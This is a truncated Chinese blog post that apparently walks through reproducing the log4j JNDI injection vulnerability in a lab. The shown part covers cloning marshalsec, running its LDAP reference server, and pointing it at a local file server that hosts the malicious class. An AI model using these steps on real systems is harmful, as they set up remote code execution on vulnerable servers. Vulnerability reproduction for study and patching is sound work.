甜蜜芝麻

文章
3
资源
0
加入时间
3年0月28天

log4j漏洞,jndi侵入验证复现

log4j的1.14.1往下版本需要先搭建一个LDAP服务器,git地址git clone https://github.com/mbechler/marshalsec.git执行 marshalsec.jndi.LDAPRefServer 的main函数,idea添加执行命令"http://127.0.0.1/fileService/download/1/1/#test" 8888意思是将文件服务器http://127.0.0.1/fileService/download/